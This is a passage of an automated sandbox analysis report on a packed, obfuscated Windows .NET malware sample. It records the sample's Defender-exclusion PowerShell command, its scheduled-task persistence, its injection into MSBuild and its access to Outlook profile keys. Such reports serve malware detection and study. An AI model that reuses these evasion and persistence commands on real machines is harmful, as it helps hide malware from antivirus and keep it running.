                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmpJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeUnpacked PE file: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.9e0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack, fJ.cs.Net Code: xG(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xG(typeof(IntPtr).TypeHandle),typeof(Type)})
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.cs.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.cs.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.cs.Net Code: laCwTcr87k System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119716A push esi; retf 0_2_0119716B
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119719D push esi; retf 0_2_0119719F
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197184 push esi; retf 0_2_01197185
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011971B2 push esi; retf 0_2_011971B3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011971CC push esi; retf 0_2_011971CD
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011971F9 push esi; retf 0_2_011971FB
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011971E5 push esi; retf 0_2_011971E7
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197052 push edi; retf 0_2_01197053
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011970BA push edi; retf 0_2_011970BB
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011970A5 push edi; retf 0_2_011970A7
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011970D1 push edi; retf 0_2_011970D2
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119731C push ebp; retf 0_2_0119731D
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197330 push ebp; retf 0_2_01197331
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197349 push esp; retf 0_2_0119734B
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011973BF push esp; retf 0_2_011973C0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011973AA push esp; retf 0_2_011973AC
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011973D5 push esp; retf 0_2_011973D7
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197214 push esi; retf 0_2_01197215
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197244 push ebp; retf 0_2_01197246
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119729B push ebp; retf 0_2_0119729C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01199ABF push edx; iretd 0_2_01199ACE
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011972B2 push ebp; retf 0_2_011972B3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119750D push ebx; retf 0_2_01197513
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119753B push edx; retf 0_2_01197541
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197521 push ebx; retf 0_2_01197527
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197571 push edx; retf 0_2_01197572
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119759C push edx; retf 0_2_0119759D
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01197585 push edx; retf 0_2_01197586
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011974B4 push ebx; retf 0_2_011974B5
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119775B push eax; retf 0_2_0119775C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119765D push ecx; retf 0_2_0119765E
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: section name: .text entropy: 7.918332877222406
                        Source: jYRIGnZlROed.exe.0.drStatic PE information: section name: .text entropy: 7.918332877222406
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, w5kRXIEyNHLCA4q0mI.csHigh entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, TP8g38Um4R6d0M0DsL.csHigh entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, yYEr0RR3riR6w5Fsow.csHigh entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, xFVsduJMHuXdxbPXUph.csHigh entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, LKBfTCbdQSshkW5PVZ.csHigh entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, vGvJNFae6POHakxWt5.csHigh entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, UakL7sKoGotEXVmhgN.csHigh entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, DXYb74JvCf3hSRbyBWK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, M782IFS87VYPID5jlC.csHigh entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Ol4IUSXbtb4CW66ULT.csHigh entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, eQoN8V4ZQKOo5fBfcW.csHigh entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Q88LQxsQcXJs1kQMVN.csHigh entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, jUd3Iw3wbFFMK2SL4c.csHigh entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, lj55A0LOMPVEbPDdds.csHigh entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, i683mmclysbpgLaM5y.csHigh entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, S0hOXR1XtDPS19yNu0.csHigh entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, Jgrt1XzoXMntc59G8h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, tyZ3hcDXwYckf869Y8.csHigh entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.6600000.13.raw.unpack, H6NLodPeuiC6nVqsgI.csHigh entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, w5kRXIEyNHLCA4q0mI.csHigh entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, TP8g38Um4R6d0M0DsL.csHigh entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, yYEr0RR3riR6w5Fsow.csHigh entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, xFVsduJMHuXdxbPXUph.csHigh entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, LKBfTCbdQSshkW5PVZ.csHigh entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, vGvJNFae6POHakxWt5.csHigh entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, UakL7sKoGotEXVmhgN.csHigh entropy of concatenated method names: 'yv0DKe0Efo', 'chcDCmQNmk', 'Is4DYyj478', 'mqmD6Wp51S', 'VZ2Df8cehC', 'fldD3Hx8yn', 'I1vD7DYEJp', 'lcKDmOuygF', 'nL5DkA7W3W', 'jO6DIXLsX4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, DXYb74JvCf3hSRbyBWK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Um7eosP2VG', 'hn7e9Rp4Rn', 'gpUehFMoby', 'EqUeORScKD', 'OodeB6vABr', 'yLUedB62pu', 'MpGeJMf50K'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, M782IFS87VYPID5jlC.csHigh entropy of concatenated method names: 'SHSZW1wwwP', 'eUrZi37vuR', 'b2IZyilGsW', 'JAUZNimGqU', 'JsgZP4cL7A', 'jBAyBcS2rJ', 'BGUydYvGPw', 'QmvyJD43Ro', 'VO2ySSX79T', 'zdgy1k5DRe'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Ol4IUSXbtb4CW66ULT.csHigh entropy of concatenated method names: 'YitioNl8ZN', 'WQyi9PC8a1', 'vffih6UNxm', 'YGjiOmGUtS', 'tkdiBc3DVl', 'zyKid3Jh6r', 'AxriJ4cAVT', 'g00iSFHVG3', 'Uuti1Gvff5', 'd8yiLa9iNA'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, eQoN8V4ZQKOo5fBfcW.csHigh entropy of concatenated method names: 'PVITHiYMI', 'BXX4UDESn', 'zVvndL8xI', 'A4HplBlLC', 'Hc3Cq4Pec', 'bhJ0sNW3V', 'VeDtudvwe8Kp8BBQWf', 'Q2iHZJuUPGeBXgH0eV', 'dT0Q1qBVQ', 'rHGeOHNvl'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Q88LQxsQcXJs1kQMVN.csHigh entropy of concatenated method names: 'KYQqNOknVA', 'JsKqPxL3AM', 'vJ6qjHr2H8', 'fbmqvDCgZM', 'MV0qMFyNbR', 'muNqg3lCEj', 'NewQQPQbSoli1jKWX4', 'DDJmPwRXAhSULraE4C', 'G7QqqvHB90', 'pf1qA6b6yY'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, jUd3Iw3wbFFMK2SL4c.csHigh entropy of concatenated method names: 'OyHxjrMD2B', 'WxixvJQb6a', 'ToString', 'NDbx2LWeVU', 'E13xitmdhK', 'BvOxRGmfDc', 'WyRxysCXEy', 'mnDxZMayFq', 'TUGxN5Dg60', 'vDDxPiPfg0'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, lj55A0LOMPVEbPDdds.csHigh entropy of concatenated method names: 'Dispose', 'sIiq1D20WY', 'AX856IdXYq', 'CN2bbTKMQA', 'qYLqLD8uUx', 'Jtfqz5kYM0', 'ProcessDialogKey', 'Jwc5l6yGwy', 'cPW5qnhV2Z', 'WyQ55b3Ps4'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, i683mmclysbpgLaM5y.csHigh entropy of concatenated method names: 'LkLQ2HQhaZ', 'IHmQiUDvlN', 'zcGQR9R6i6', 'H6TQyuPmso', 'PiHQZ245aP', 'gmgQNvBWBQ', 'J6bQPV6q9W', 'LGxQaLLt1g', 'LLYQjmDqO1', 'AosQv3IoRq'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, S0hOXR1XtDPS19yNu0.csHigh entropy of concatenated method names: 'ToString', 'KSagIOkILO', 'zLyg67KPmf', 'YexgGyZO44', 'dS9gfvTiDl', 'VZ3g3EDf7E', 'pi4gFZLDSm', 'DW7g7p351H', 'dyEgmw1BUC', 'NrcgEVowVo'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, Jgrt1XzoXMntc59G8h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wFYuDNr6RX', 'TeUuMcGX7V', 'NDIugjMNay', 'F1TuxZG4fu', 'SvquQKU1o2', 'GH3uue7yX0', 'WG8ue2ETdM'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, tyZ3hcDXwYckf869Y8.csHigh entropy of concatenated method names: 'eM9uqNuOZX', 'AXLuARbs4O', 'kn3uwRMR4M', 'BJxu2khww4', 'MwauifwuEO', 'JR8uyB8w8f', 'lMguZg2m5e', 'JC0QJjY7I7', 'EXpQSvP7gf', 'm36Q16r8h6'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, H6NLodPeuiC6nVqsgI.csHigh entropy of concatenated method names: 'BCdxSZ9Yc6', 'GvexLuTJUJ', 'kXRQlY7bjo', 'VU7QqAhAVT', 'fiBxIMTlVB', 'PM3xcZyhCY', 'YisxrZi3Uy', 'Jj9xoGV4CX', 'nctx9yuGgd', 'zVMxhNHbhF'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack, fJ.csHigh entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, w5kRXIEyNHLCA4q0mI.csHigh entropy of concatenated method names: 'G87QY5rCiv', 'bMjQ6A5qQn', 'G9TQGgmJN7', 'KK2QfIfNxB', 'ELNQol2WoL', 'qANQ3ZHbfh', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, TP8g38Um4R6d0M0DsL.csHigh entropy of concatenated method names: 'JxsR4M6mwg', 'dpFRnqCb8V', 'jBNRKAd0el', 'WL2RChXldT', 'vb6RMkEhY4', 'nvnRgvx2Wc', 'd8URxSnFQ1', 'B81RQ35TIb', 'zC3RuIM5kk', 'yNMRedJXge'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, yYEr0RR3riR6w5Fsow.csHigh entropy of concatenated method names: 'ck7NHsTAAb', 'VwVNVty9Od', 'Y7BNTSFkZt', 'irKN4aIOQu', 'EylNsiv4TV', 'SNUNnb6pH3', 'BqtNpO6Vgw', 'rxNNKB4VFM', 'MPfNC7HD9u', 'gRrN0WIY1k'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, xFVsduJMHuXdxbPXUph.csHigh entropy of concatenated method names: 'p2iuH5300i', 'huFuVBZ1TC', 'vINuTJvWmd', 'WJFu4oFOBC', 'D5Lussc0GL', 'AXEunDPNK8', 'sKJupcBoFn', 'vHduK40FPs', 'NgCuCJvM27', 'rxFu0HPtPu'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, LKBfTCbdQSshkW5PVZ.csHigh entropy of concatenated method names: 'fpTN2AFvK3', 'bsDNRBcYVu', 'qdDNZoCpvM', 'zl2ZLqH1MB', 'Ch2ZzQYdDE', 'pitNlyYA1A', 'ByMNqTUeSd', 'BEmN5dknQY', 'IPeNAPvH8e', 'G9bNwUXBkD'
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, vGvJNFae6POHakxWt5.csHigh entropy of concatenated method names: 'YMnAWH6tpI', 'FJlA2CvBeZ', 'tRBAiKUaUx', 'Xy5ARfna65', 'jm3AyVfOTc', 'EdIAZKPuxv', 'qBFANaP4bC', 'mCoAPl5WQE', 'au9AawKXL2', 'DQuAjRDnDU'
